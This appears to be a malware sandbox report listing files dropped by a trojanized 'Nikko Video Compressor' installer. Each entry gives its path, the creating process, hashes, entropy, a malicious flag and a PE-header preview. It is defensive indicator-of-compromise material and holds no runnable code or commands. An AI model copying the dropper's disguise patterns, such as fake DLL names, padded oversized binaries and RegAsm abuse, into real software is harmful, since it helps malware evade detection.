SSDEEP:	49152:RtkjTCvq/irWfqk7ibFuToinSryh3UgXUID83EIQCw6xVw6:Rt1q/IWfqk7ibFu0iL3+4wQCw6xl
MD5:	F17E31F7B5B7FC2C176C9005EB0A0554
SHA1:	1DCADB3CFAD82DE36E8180844915290F5128BF0E
SHA-256:	2D2A00F69AFB4442B3FE54E68460C30F271C6DA90BC5B8946DD169F411E29DBB
SHA-512:	C8C227A2029E6285232C9C6EDAA1F83709E77D963151AFE72D4FE77BF17D5762CEBA91C2B93A48249D455FD94A1157CFF3653E889BBA68C16876A47F3D9E2D47
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{.L..................".........d."......."...@...........................*.....).+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1471856
Entropy (8bit):	6.8308189184145665
Encrypted:	false
SSDEEP:	24576:6PQ+KpPa3kPjWWJy+0PX7PM6ZB9In8QmMMWwI6/I+no9R2aFVWKZxPo89/xc3lRc:brWW0jnMVpUBuwemQnGP8RqYr1mpbk3
MD5:	A236287C42F921D109475D47E9DCAC2B
SHA1:	6D7C177A0AC3076383669BCE46608EB4B6B787EC
SHA-256:	63AA600A7C914C2D59280069169CC93E750E42C9A1146E238C9128E073D578FD
SHA-512:	C325B12235AD77937E3799F1406EB6AA3BC5479BFDFF0EA2F2178FE243E63689AC37BB539ADCBB326B0DE6C09B884771AD57F59184A5B69065682855382ADD8A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A.W.A.W.A.W.%.V.A.W.%.VeA.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.%.V.A.W.A.WUA.W.A.W.A.W2%.V.C.W2%.V.A.W2%.W.A.W2%.V.A.WRich.A.W................PE..L.....r^...........!.....v...............................................................@..........................r......H*..x.......X............B..p3..........@e..............................`e..@............................................text....u.......v.................. ..`.rdata..............z..............@..@.data........@...j... ..............@....rsrc...X...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719720
Entropy (8bit):	6.620042925263483
Encrypted:	false
SSDEEP:	12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
MD5:	20B6B06BBD211A8ACFE51193653E4167
SHA1:	817D442B46DD6F35FD9641E0C7262C934ED76848
SHA-256:	7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
SHA-512:	0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?\|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.414789978441117
Encrypted:	false
SSDEEP:	12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:	561FA2ABB31DFA8FAB762145F81667C2
SHA1:	C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:	DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:	7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:\|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.542655141037356
Encrypted:	false
SSDEEP:	6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:	86F1895AE8C5E8B17D99ECE768A70732
SHA1:	D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:	8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:	3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4\|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	6.542831007177094
Encrypted:	false
SSDEEP:	6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
MD5:	EE856A00410ECED8CC609936D01F954E
SHA1:	705D378626AEC86FECFDF04C86244006BC3AF431
SHA-256:	B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
SHA-512:	666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4.$QN.%4.$.N.%4.$IN.%4.$YN.%..$HN.%..$GN.%..$KN.%..$XN.%[N.%.O.%..$iN.%..$ZN.%.e%ZN.%..$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-Q0C3D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719521
Entropy (8bit):	6.515816318838982
Encrypted:	false
SSDEEP:	12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byxHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErdn
MD5:	5AA0D5DFD8F32EF2F329923506B64E50
SHA1:	3F26B5DC3EFC27D4CCE60FC23B05A34FBCF293E9
SHA-256:	7F7EBDD0095F53AA817B0E9CAF6AD5F94D6132B42CED75AB1008D928D94D9EEE
SHA-512:	DBD28DC92F2915EA8D94FFB15832B877F728C3E42F9CCF84F7E666A337D725F9714D812ADFFF62FDA50F0FEF46E43AE1109FDA57DF8C12FC12C4076F4C5D5B39
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	InnoSetup Log Nikko Video Compressor, version 0x30, 4528 bytes, 580913\user, "C:\Users\user\AppData\Local\Nikko Video Compressor"
Category:	dropped
Size (bytes):	4528
Entropy (8bit):	4.636189194530859
Encrypted:	false
SSDEEP:	96:5/dWIl4488GpZPtoDWX9H+eOIhcfgi4cVSQs0LJqjpUyHGaoVq1l:5/dWY448JpptoLHIhcfccVSQ1Jq9UyHt
MD5:	CB9E92A26165CF40F351498D7EB998B1
SHA1:	573F7AEA54E3B1A4B7D7FA1D2A5A2CFF64838D4C
SHA-256:	45E830C62C90459FC6170A0B824C1C490213011DC1B97A8BCFA8BBEB89E8AFFE
SHA-512:	331727D5D52D958A8C29E6762B5F1DFF90DD1233EC82A943C528E40374624ACC7B4FC869B206B1750874AC25155E82979F9D84279504EE0B0CE955CD61898F97
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................Nikko Video Compressor..........................................................................................................Nikko Video Compressor..........................................................................................................0...........%..........................................................................................................................ID........Q....580913.user2C:\Users\user\AppData\Local\Nikko Video Compressor...........0.#.k.. .....P......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3

C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719521
Entropy (8bit):	6.515816318838982
Encrypted:	false
SSDEEP:	12288:TQszP8NRMXpc/rPx37/zHBA66pE+4p1YR71CERdH6rN9byxHaOMe3mxyF/:TQQP8YXpc/rPx37/zHBA6plp+51CErdn
MD5:	5AA0D5DFD8F32EF2F329923506B64E50
SHA1:	3F26B5DC3EFC27D4CCE60FC23B05A34FBCF293E9
SHA-256:	7F7EBDD0095F53AA817B0E9CAF6AD5F94D6132B42CED75AB1008D928D94D9EEE
SHA-512:	DBD28DC92F2915EA8D94FFB15832B877F728C3E42F9CCF84F7E666A337D725F9714D812ADFFF62FDA50F0FEF46E43AE1109FDA57DF8C12FC12C4076F4C5D5B39
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2801664
Entropy (8bit):	6.704411900002309
Encrypted:	false
SSDEEP:	49152:UtkjTCvq/irWfqk7ibFuToinSryh3UgXUID83EIQCw6xVw6:Ut1q/IWfqk7ibFu0iL3+4wQCw6xl
MD5:	8C1835DABEA53E9D98E866C950CD260D
SHA1:	8676E818D7A45503B906FD0F3CF4B0EDAF5AC8FC
SHA-256:	B9B88394BC3C964540130E4B5D0A9AC339DC0BBAC35F418EAB872674D5E07AB7
SHA-512:	1444879EA6CFBA3ED187DB1D084425202D9789A38B87D6CC306E1DFDE4246F1C83757581DE7726788C2B2C1C95D8C2E5C19B7E2F352DF12AA6FB52211BB289BB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d{.L..................".........d."......."...@...........................*.....).+.......................................".@.....#.XZ............................................................................"..............................text.....".......".................`....rdata...C...."..P....".............@..@.data...xT...0#..0...0#.............@....rsrc....`....#..`...`#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dll

Download File

Process:	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	310109184
Entropy (8bit):	0.056647913043850126
Encrypted:	false
SSDEEP:	24576:e2JIkJBboEeCn8fhE85ha+M9uf5ThdA2j9Rz8OyI:e2FMhE858Q5lfz
MD5:	0294A0680BC67B4737AFC0B88A35AB69
SHA1:	94BE4B5F2202EFE2ED64154D04738E677B604C37
SHA-256:	949E7AD9D707D83A5BEA025B66423D9F121515618086449D872FFCC19BB7B12C
SHA-512:	0498CC8C9D9917EC6C8252BEF0D0C3DBA80360E5D6BA56A7F207931CCED9A8D8CC26862835DD925D79DFF29F723D634D9EEE461E965EBC873FDD6140952387B6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|.f...........#...#.H...@...............`.....b.....................................@... .........................`....................................0..........................................................t............................text...<F.......H..................`.P`.data........`.......L..............@.`..rdata..@............b..............@.`@.eh_fram.....P.......&..............@.0@.bss....t.............................`..edata..`...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1075200
Entropy (8bit):	7.828820550765554
Encrypted:	false
SSDEEP:
MD5:	8C8AF20BF6536903C1D042CEBEDE6475
SHA1:	8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
SHA-256:	B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
SHA-512:	8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r)..p~....o-...(......t.....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\AppData\Local\Temp\Tmp8FCF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp8FFF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	818DB642C70FEBED6218762BCF3CA3ED
SHA1:	596B50BD016897E8AE48E7A77C85E2057490E891
SHA-256:	204D6A72E295B2D04BCDA51C0DC2E8D6F5B08B4152A659391EA4389DA2905007
SHA-512:	9073D733828F7865C5B13ACD13F161FDDAF7017B7E1C7A1C886C642EE75F9924833AE9C15EFD3244D17CDB1EA4D30F95E0A2EAB261AA882C6C3B8E90602880BB
Malicious:	false
Reputation:	unknown
Preview:	IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII

C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Download File

Process:	C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	708096
Entropy (8bit):	6.507423175839584
Encrypted:	false
SSDEEP:
MD5:	010CD22508FA12015E83A39FEB2DB9AA
SHA1:	4ECBD1FDE23ABA22FB6A871E0D4F9C4BA4319432
SHA-256:	0DB9239768D6A31781C9E636296D3F77F39EB8903AD3AFB6BE3D9117B62E2E1E
SHA-512:	C34777C94B5CE326ADAEA57FC142012D6BDAE9D6869E824C9F22D1EDF28892C4E3DEB47D93EEA661567D5411629FDE2B4FDD14516A52F6771549AD018FC16B79
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...............................%........................................................... ......................................................CODE....,........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..(....0......................@..P.rsrc...............................@..P.....................Z..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.363359036723334
Encrypted:	false
SSDEEP:
MD5:	526426126AE5D326D0A24706C77D8C5C
SHA1:	68BAEC323767C122F74A269D3AA6D49EB26903DB
SHA-256:	B20A8D88C550981137ED831F2015F5F11517AEB649C29642D9D61DEA5EBC37D1
SHA-512:	A2D824FB08BF0B2B2CC0B5E4AF8B13D5BC752EA0D195C6D40FD72AEC05360A3569EADE1749BDAC81CFB075112D0D3CD030D40F629DAF7ABCC243F9D8DCA8BFBE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314613760
Entropy (8bit):	0.002153493945743197
Encrypted:	false
SSDEEP:
MD5:	B7D419FC07617B934D9D062DB78C1B47
SHA1:	DEA8D4248A027927F0EE57B114BB98B60B776F7F
SHA-256:	3569B810E5FA7F87B796E56E5111605056E326ADC22029CF032709CF85D9386F
SHA-512:	3F75EBD2851D5DB3291F1825068EBBF2B590F9681BE4CC7E916578A056CE122656FEC0DB2595C5D8DCFC21BA945EA87650AB961527C7038EA32B039B0E9AE948
Malicious:	true
Reputation:	unknown
